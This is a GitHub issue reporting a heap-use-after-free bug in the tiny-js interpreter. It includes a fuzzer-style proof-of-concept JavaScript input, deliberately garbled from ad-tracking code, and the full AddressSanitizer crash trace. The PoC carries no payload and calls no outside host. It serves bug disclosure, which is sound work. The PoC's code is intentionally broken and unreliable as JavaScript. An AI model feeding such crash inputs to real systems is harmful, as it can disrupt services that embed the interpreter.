Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

heap-use-after-free #30

Open
bird8693 opened this issue Apr 17, 2020 · 0 comments
Open

heap-use-after-free #30

bird8693 opened this issue Apr 17, 2020 · 0 comments

Comments

@bird8693
Copy link

Enviroment

operating system: ubuntu18.04
compile:  
Use Google's ASAN(https://github.com/google/sanitizers) for vulnerability detection. Specifically in Makefile, `add -fsanitize=address` to CFLAGS
make
test command: ./run_tests  poc

poc:

function ReadCookie(cookieName) {
        return '';
    var ind1 = theCookie.indexOf(';', ind);
    if (ind1 == -1)
        ind1 = theCookie.length;
    return unescape(theCookie.substring(ind + cookieName.length + 1, ind1));
}
function ReadZagi(zagiName) {
    var zagi = ReadCookie('zagi');
    var ind = zagi.indexOf(zagiName);
    if (ind == -1 || zagiName == '')
        return '';
    var ind1 = zagi.indexOf('&', ind);
    if (ind1 == -1)
        ind1 = zagi.length - 1;
    return zagi.substring(ind + zagiName.length + 1, ind1);
}
var zip = ReadZagi('zip_code');
var city = ReadZagi('city');
var state = ReadZagi('state');
var gender = Re?dZagi('gender') == 'M' ? 'm' : ReadZagi('gender') == 'F' ? 'f' : '';
var subscribes = String(parseInt(ReadZagi('subscri'18-20';
    } else if (years_old < 25) {
        return '21-24';
    } else if (years_old < 30) {
        return '25-29';
    } else if (years_old < 35) {
        return '30-34';
    } else if (years_old < 40) {
        return '35-39';
    } else if (years_old < 45) {
        return '40-44';
    } else if (years_old < 50) {
        return '45-49';
    } else if (years_old < 55) {
        return '50-54';
    } else if (years_old < 60) {
        return '55-59';
    } else if (years_old < 65) {
        return '60-64';
    }
    return '65plus';
}
var age_range = AgeToRange(ReadZagi('age'));
function IncToRange(inc) {
    var idx = 0;
    var numstr = '';
    for (idx = 0; idx < inc.length && inc[idx] != '+'; idx++)
        if (!isNaN(parseInt(inc[idx])))
            numstr += inc[idx];
    inc = parseInt(numstr);
    if (isNaN(inc)) {
        return '';
    } else if (inc <= 24999) {
        return 'less25000';
    } else if (inc <= 34999) {
        return '25000-34999';
    } else if (inc <= 49999) {
        return '35000-49999';
    } else if (inc <= 74999) {
        return '50000-74999';
    } else if (inc <= 99999) {
        return '75000-99999';
    } else if (inc <= 149999) {
        return '100000-149999';
    } else if (inc <= 249999) {
        return '150000-249999';
    } else if (inc >= 250000) {
        return '250000plus';
    }
}
var inc_range = IncToRange(ReadZagi('income'));
var _ord = _ord || Math.random() * 1000000000000000000;
var _tile_params = ';ord=' + _ord;
var _demo_params = '';
if (age_range)
    _demo_params += ';age=' + age_range;
if (gender)
    _demo_params += ';gender=' + gender;
if (inc_range)
    _demo_params += ';income=' + inc_range;
if (subscribes)
    _demo_params += ';sub=' + subscribes;
var yld_mgr = {
    place_ad_here: funct

vulnerability description:

It is a use-after-free vulnerability, below is the asan output:
==19716==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000008ed8 at pc 0x00000044221a bp 0x7fffb87ca5f0 sp 0x7fffb87ca5e0
READ of size 1 at 0x606000008ed8 thread T0
#0 0x442219 in CTinyJS::ternary(bool&) /home/node/tiny-js/TinyJS.cpp:1867
#1 0x442934 in CTinyJS::base(bool&) /home/node/tiny-js/TinyJS.cpp:1887
#2 0x442634 in CTinyJS::ternary(bool&) /home/node/tiny-js/TinyJS.cpp:1876
#3 0x442934 in CTinyJS::base(bool&) /home/node/tiny-js/TinyJS.cpp:1887
#4 0x4466e4 in CTinyJS::statement(bool&) /home/node/tiny-js/TinyJS.cpp:1974
#5 0x44b23a in CTinyJS::execute(std::__cxx11::basic_string<char, std::char_traits, std::allocator > const&) /home/node/tiny-js/TinyJS.cpp:1322
#6 0x40718c in run_test(char const*) /home/node/tiny-js/run_tests.cpp:219
#7 0x4068b0 in main /home/node/tiny-js/run_tests.cpp:258
#8 0x7f000c85082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#9 0x406b68 in _start (/home/node/tiny-js/run_tests+0x406b68)

0x606000008ed8 is located 56 bytes inside of 64-byte region [0x606000008ea0,0x606000008ee0)
freed by thread T0 here:
#0 0x7f000d534b2a in operator delete(void*) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99b2a)
#1 0x44256e in CTinyJS::ternary(bool&) /home/node/tiny-js/TinyJS.cpp:1864

previously allocated by thread T0 here:
#0 0x7f000d534532 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99532)
#1 0x439204 in CTinyJS::factor(bool&) /home/node/tiny-js/TinyJS.cpp:1568

SUMMARY: AddressSanitizer: heap-use-after-free /home/node/tiny-js/TinyJS.cpp:1867 CTinyJS::ternary(bool&)
Shadow bytes around the buggy address:
0x0c0c7fff9180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff91a0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
0x0c0c7fff91b0: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd
0x0c0c7fff91c0: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c0c7fff91d0: fa fa fa fa fd fd fd fd fd fd fd[fd]fa fa fa fa
0x0c0c7fff91e0: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd
0x0c0c7fff91f0: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0c7fff9200: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
0x0c0c7fff9210: fd fd fd fd fd fd fd fd fa fa fa fa 00 00 00 00
0x0c0c7fff9220: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==19716==ABORTING

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant